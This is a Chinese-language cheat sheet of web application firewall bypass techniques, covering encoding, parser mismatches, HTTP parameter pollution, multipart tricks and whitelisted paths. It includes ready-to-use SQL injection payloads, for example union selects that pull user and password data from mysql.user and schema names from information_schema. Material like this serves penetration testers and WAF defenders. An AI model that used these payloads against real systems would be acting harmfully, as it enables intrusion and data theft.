WAF绕过的各种姿势
主要思路:
根据WAF部署位置,针对WAF、WEB服务器、WEB应用对协议解析、字符解析、文件名解析、编码解析以及SQL语法解析的差异,绕过WAF,将payload送至服务器执行。
常用绕过方法:
1.转换特征字符大小写
2.利用注释绕过
3.编码特征字符绕过
4.分隔重写特征字符绕过
5.利用截断字符绕过
6.变换变量位置绕过
7.针对域名保护的绕过
8.超大数据包绕过
9.转换数据提交方式绕过
10.HPP(HTTP参数污染)绕过
1、利用性能因素绕过。
WAF在设计的时候都会考虑到性能问题,检测数据包的包长或检测数据流长度,有一个限制。因此在设计WAF的时候可能就有一个默认值,默认多少个字节的流大小,或是多少个数据包。
可以向HTTPPOST添加填充数据,达到一定数目之后,POST中的sql注入恶意代码没有被检测了,达到了bypass的目的。
WAF的业务影响问题,一些传统硬件防护设备为了避免在高负载的时候影响用户体验,如延时等问题,会在高负载的时候关掉WAF防护功能,在低负载的时候又开启WAF功能。
此方法,主要针对软waf。可将一个payload,使用脚本并发发送多次,发现有些通过了WAF,有些被WAF拦截了。
2、字符解析问题。
一些WAF会由于某些字符解析出错,造成全局的bypass。
测试点:
1):get请求处
2):header请求处
3):post urlencode内容处
4):post form-data内容处
测试内容:
1)编码过的0-255字符
2)进行编码的0-255字符
3)utf gbk字符
\×00,&,&&,宽字符。
3、白名单绕过
基于IP地址的白名单,一般很难绕过。
基于应用层的数据的白名单,就可能造成bypass。
特殊目录白名单的绕过。
有些WAF,将admin dede install等特殊目录作为白名单。
被拦截:
GET/pen/news.php?id=1 union select user,password from mysql.user
通过:
GET/pen/news.php/admin?id=1 union select user,password from mysql.user
GET/pen/admin/.\news.php?id=1 union select user,password from mysql.user
4. WEB服务层绕过
(1)利用WAF系统、WEB服务器、WEB应用以及数据库对字符解析的不一致,进行绕过。
%的问题:
s%elect,WAF层可能的解析结果s%elect;iis+asp解析结果select。
对unicode编码的识别:
s%u0065%u006cect,WAF无法识别,asp+iis的环境识别为select;aspx+is的环境识别出错。
(2) 构建畸形HTTP请求方法进行绕过。
某些apache版本在做GET请求的时候,无论method为何值均会取出GET的内容,如请求为的method为DOTA2,
依然返回了aid为2的结果。
(3)构建畸形的boundary进行绕过。
协议头里有个boundary是随机生成的字符串,用来分隔文本的开始和结束。
对于php+apache组合:Php在解析multipart data的时候,对于boundary的识别,只取了逗号前面的内容,
而WAF可能能够识别整个boundary。例如boundary设为----ccccccc,select*from db,php解析的时候只
识别了----ccccccc,后面的内容被作为内容部分。此时可能就会出现BYPASS。
5.WEB应用层绕过
(1)变换请求方式
某个参数可以从get参数中获取,可以从post参数获取,也可以从cookie参数中获取。而WAF没有完全过滤这些请求方式。
有些waf过滤的时候过滤了get和post,但是cookie方式没有过滤。因此,可直接更改cookie参数提交payload,即绕过。
(2)urlencode与form-data
POST在提交数据的时候有两种方式,第一种方式是使用urlencode的方式提交,第二种方式是使用form-data的方式提交。
有些waf过滤的时候过滤了urlencode,但是form-data方式没有过滤。因此,可利用form-data方式绕过。
(3)畸形请求方式
asp/asp.net request解析问题。
在asp和asp.net中获取用户提交参数一般使用request包,如使用request[' ']来获取,可能会出现问题。
当使用request [ ]的形式获取数据的时候,会出现GET,POST分不清的情况。可以构造一个请求包,
METHOD为GET,但是还带有POST的内容和POST的content-type。
(4)HTTP参数污染(HPP)
?id=1&id=2&id=3的形式,在获取id值的时候不同的web技术获取的值是不一样的。
假设提交的参数即为:id=1&id=2&id=3
解析结果:
Asp.net+iis: id=1,2,3
Asp+iis: id=1,2,3
Php+apache: id=3
构造:index.php?a=1&a=select 1 union select2
(5)multipart协议解析错误导致文件名覆盖
在multipart协议中,一个文件上传块存在多个Content-Disposition,
将以最后一个Content-Disposition的filename值作为上传的文件名。
许多WAF解析到第一个Content-Disposition就认为协议解析完毕,获得上传的文件名,从而导致被绕过。
6.DB层绕过
数据库层bypass实质是在bypass WAF的sql注入防护规则。针对数据库特性构造sql注入语句绕过。
一般绕过了select from就基本可以sql注入获取数据了。
SQL注入的检查,主要是指参数和union之间、union和select之间,select与from之间,from和后面
的参数之间等几个关键位置进行。
(1)\Nunion的形式
select * from corp where corp_id=\Nunion (select 1,(select schema_name from information_schema.schemata limit 1));
(2)浮点数形式
select * from corp where corp_id=1.1union (select 1,(select schema_name from information_schema.schemata limit 1));
(3)8e0的形式:
select * from corp where corp_id=8e0union (select 1,(select schema_name from information_schema.schemata limit 1));
(4)利用/!50000/的形式
select * from corp where corp_id=-3/*!50000union*/(select 1,(select schema_name from information_schema.schemata limit 1));
(5)空格替换:
%09,%0a,%0b,%0c,%0d,%a0,/**/,/*somewords*/,().
7、其他变形
(1),-1,+1,~1,@8""",0,\N等
select * from corp where corp_id=8e0union (select -1,(select schema_name from information_schema.schemata limit 1));
select * from corp where corp_id=8e0union (select@'id',(select schema_name from information_schema.schemata limit 1));